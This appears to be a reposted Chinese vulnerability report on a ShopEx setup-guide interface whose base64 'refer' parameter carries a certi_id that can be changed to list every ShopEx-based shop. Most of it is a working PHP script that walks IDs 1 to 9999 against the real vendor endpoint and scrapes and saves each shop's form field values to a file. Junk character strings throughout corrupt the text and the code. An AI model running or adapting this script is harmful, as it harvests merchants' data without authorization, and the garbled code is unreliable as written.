|
|
简要描述:
0 h5 E8 D( A* F( t! m( hShopEx某接口缺陷,可遍历所有网站
- C% N. S7 L4 {1 X3 ?* Z详细说明:3 t3 y; q/ t( o% C( u3 p0 w" N
问题出现在shopex 网店使用向导页面
1 O8 X+ H/ ?0 x' `3 [
0 ~% B* X3 Z: ]' i9 m- I' P: t$ l# I7 D
% `0 h g# Q& X5 h8 a( ?
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
1 Q# z0 H6 ?7 i! q6 m: D1 [: F3 @6 t' Y# `% g
/ f& n, s3 m- n; m9 ]4 c9 H- F7 _4 G- [1 T# d# e4 c
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
4 B9 l) D: F' i: C( w& ~, I' l* l! z- t) t H
3 c9 \" ^9 {, V( `# E& W3 |5 x
' s8 q0 f- h6 k3 u0 m我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
& p8 e1 t6 n0 w0 |
+ d. T3 n; U& S' l+ C2 g7 `$ T5 B' |( q7 ^3 r5 r- Y. F
' z$ I8 C% h3 B+ G% X3 a& }0 o1 W
<?php
9 E# i( r4 h& l3 `: N( A% w/ k3 u
" o" {3 _2 J; `' a. z" A d for ($i=1; $i < 10000; $i++) { //遍历. _0 ?; m- m, l/ ]0 d% v4 K* f. d
, P9 F8 g" N' Z2 Z4 s
ShowshopExD($i);' a( Q: K8 R8 z
- d, S- {% l8 U
}
3 M1 n2 A! ~0 }( X
5 C' N8 @4 [, ~( T6 z F" t+ C G function ShowshopExD($cid) {
3 Z1 i& f& t2 T' u& e7 }* @( y, q
' a4 b6 E( j/ K6 ] $url='http://guide.ecos.shopex.cn/step2.php';4 V; p" K' E% s5 R% l) V
- m$ I. C: I0 M0 `8 Q* z
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');0 D. F$ ^% N9 J/ l( R' g2 o9 r. G
: P5 O9 K! _0 E1 x3 C. i
$url = $url.'?refer='.$refer;# j' R% u* O' ]/ e
- \3 R, h/ M- z% l
$ch = curl_init($url);
]7 b1 s' W9 q9 A) W# q1 P8 w8 K% x# }% ^. o. y, d2 }
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;* p/ Q! u- l+ |' F
" p4 X1 u: W& M9 P. ? curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
8 F/ Z" n% b A7 @% C" T
* \, q& Y3 E* X6 b $result = curl_exec($ch);; p e; z1 S9 o
# M5 S: _ D. |' j4 r' U) d
$result = mb_convert_encoding($result, "gb2312", "UTF-8");, ^4 r8 W* }% N, B
& T2 X! P( m, R( }* L9 O" j$ n if(strpos($result,$refer))* W" \4 |* N# Z* F: u7 D2 \
2 K: b P+ l1 m5 G: [
{
' C; A. c8 i( Y% k9 D: P+ U: h
5 i3 L9 U( l; W$ ^% q4 W $fp = fopen("c:/shopEx.txt",'ab'); //保存文件* ?6 a% H7 y$ v! C! z
5 c& O/ K) o- ? k$ C9 e
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
7 P3 ]2 |. u3 }# h
$ o% k: Y1 ?% m! p. j! \ foreach ($value[1] as $key) {- Z( `" t3 {& p6 u b
0 K& j: C, O3 G: N6 s
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);3 e. }3 J+ U5 t& ^) J: `5 r
6 e8 j) L( z" d) _ N7 r echo $res[1][0].':'.$res[3][0]."\r\n";
- y, d# J! A L: Z& b% L, c5 ]
! t& r9 d( _% m $col =$res[1][0].':'.$res[3][0]."\r\n"; $ O/ _* g3 l7 M8 A6 {9 `
- Y: a* ~) S" c: B& L6 V9 y6 E4 t
fwrite($fp, $col, strlen($col));
; ?5 o6 u% g7 @4 \" D, {" k5 b, _* l9 y6 G1 a
}0 D8 _' ?+ U, v; t
7 j7 U* o, I" \- T- t2 ^
echo '--------------------------------'."\r\n";
d. [* o' @; I, k5 l# I* E* Q7 O; \
) U) G, j# r* R1 |/ E- b fclose($fp); : U, M/ y0 q& t) H/ u' x
0 U3 Q! ^# L# X! Y2 G }( V2 p' u1 c4 d" H, G6 d
( f" C4 H% ~* O5 c7 R% w flush();
3 W- q% Z5 Y7 ^9 s6 a( [7 O2 y7 C. H# H5 e" ]( p: @" `
curl_close($ch);
# _6 p5 P: {8 W: l2 H4 \5 h+ m/ W
}$ {; g' k: S: o
9 f9 k1 V0 K+ y% o2 K?>6 I5 z& |' E" G0 { Z/ m8 u$ Y8 f
漏洞证明:
7 ^4 v8 v7 N8 p6 G9 q% r- {http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg5 v, [ W* P5 D& O
refer换成其他加密方式
8 Y7 D% I6 M6 `, a |
|